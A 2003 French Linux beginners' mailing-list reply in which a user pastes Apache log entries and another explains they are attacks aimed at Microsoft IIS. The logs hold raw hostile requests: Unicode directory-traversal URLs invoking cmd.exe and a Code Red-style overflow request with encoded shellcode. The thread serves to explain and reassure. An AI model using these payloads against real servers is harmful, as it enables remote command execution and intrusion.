Re: [debutant] Log Httpd

[babyblood]

Troumad wrote:

Je profite de ce fil sur les logs pour regarder les miens.
J'en suis à /var/log/httpd/access_log
Je vois plein d'engin du style :
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" 
"-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" 
"-"
68.38.238.151 - - [22/Sep/2003:07:12:35 +0200] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  
HTTP/1.0" 401 593 "-" "-"

Est-ce des attaques de virus contre des systèmes windows?
Ceci donne bien envie de modifier la place du serveur dans 
l'arborescence des ordinateurs!


Ce sont des attaques types utilisées contre les serveurs IIS de Krosoft 
(faille Unicode permettant d'avoir un "shell" distant et par exemple 
lister ton C:\).
Bien sûr c'est totelement inefficasse contre ton Apache ;-)

A bientôt


Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?
Rendez-vous sur "http://www.mandrakestore.com";.
Foire Aux Questions de la liste : http://mdk.mondelinux.org